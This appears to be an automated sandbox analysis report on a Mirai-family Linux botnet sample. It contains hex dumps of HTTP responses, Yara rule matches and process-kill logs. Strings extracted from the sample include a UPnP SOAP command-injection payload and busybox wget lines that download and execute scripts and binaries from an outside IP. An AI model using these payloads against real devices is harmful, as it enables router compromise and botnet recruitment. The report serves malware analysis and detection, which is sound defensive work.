7d 0d 0a 2e 6e 6f 74 46 6f 75 6e 64 20 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 20 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 20 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0d 0a 2e 6e 6f 74 46 6f 75 6e 64 20 2e 74 65 78 74 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 25 3b 20 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 34 29 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0d 0a 2e 6e 6f 74 46 6f 75 6e 64 20 2e 74 65 78 74 20 73 74 72 6f 6e 67 20 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 63 6f 6c 6f 72 3a 23 63 66 30 36 35 32 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 30 70 78 3b 7d 0d 0a 2e 6e 6f 74 46 6f 75 6e 64 20 2e 74 65 78 74 20 70 20 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 46 6f 75 6e 64 22 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 0d 0a 09 09 3c 73 74 72 6f 6e 67 3e 34 30 34 3c 2f 73 74 72 6f 6e 67 3e 0d 0a 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html><hea
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Wed, 14 Feb 2024 08:36:01 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 33 35 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:36:12 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Type: text/html;charset=utf-8Content-Language: enContent-Length: 774Date: Wed, 14 Feb 2024 08:36:04 GMTKeep-Alive: timeout=20Connection: keep-aliveData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 39 33 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Wed, 14 Feb 2024 08:36:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 21 2b d1 07 59 02 32 54 1f ea 40 00 da 1e 3f 07 a9 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 84(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!+Y2T@?0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:36:12 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:36:12 GMTConnection: CloseCache-Control: no-storeX-Content-Type-Options: nosniffX-Frame-Options: DENYStrict-Transport-Security: max-age=4473122; includeSubDomainsContent-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *; upgrade-insecure-requests
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Wed, 14 Feb 2024 08:36:15 GMTServer: Apache/2.4.38 (Debian) OpenSSL/1.1.1nRetry-After: 18000Last-Modified: Tue, 07 Nov 2023 18:29:55 GMTETag: "11f-60994283a8ec0"Accept-Ranges: bytesContent-Length: 287Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4f 75 72 20 61 70 6f 6c 6f 67 69 65 73 20 66 6f 72 20 74 68 65 20 74 65 6d 70 6f 72 61 72 79 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 67 65 6e 65 72 61 74 65 64 20 35 30 33 20 22 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 22 20 65 72 72 6f 72 20 64 75 65 20 74 6f 20 6f 76 65 72 6c 6f 61 64 69 6e 67 20 6f 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 6f 66 20 74 68 65 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Error 503 Service Unavailable</title></head><body><h1>503 Service Unavailable</h1>Our apologies for the temporary inconvenience. The requested URL generated 503 "Service Unavailable" error due to overloading or maintenance of the server.</body>
    Source: t0X9iGR3pD.elfString found in binary or memory: http://141.98.10.72/bins/x86
    Source: t0X9iGR3pD.elfString found in binary or memory: http://141.98.10.72/zyxel.sh;
    Source: t0X9iGR3pD.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: t0X9iGR3pD.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
    Sample tries to kill multiple processes (SIGKILL)
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 725, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 767, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 794, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 806, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 853, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 888, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 940, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 1299, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 1300, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 2956, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3212, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3213, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3218, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3304, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3329, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3392, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3398, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3402, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3406, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3412, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 725, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 767, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 794, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 806, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 853, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 888, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 940, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 1299, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 1300, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 2955, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 2956, result: successfulJump to behavior
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
    Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh0x
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 725, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 767, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 794, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 806, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 853, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 888, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 940, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 1299, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 1300, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 2956, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3212, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3213, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3218, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3304, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3329, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3392, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3398, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3402, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3406, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5577)SIGKILL sent: pid: 3412, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 725, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 767, result: successfulJump to behavior
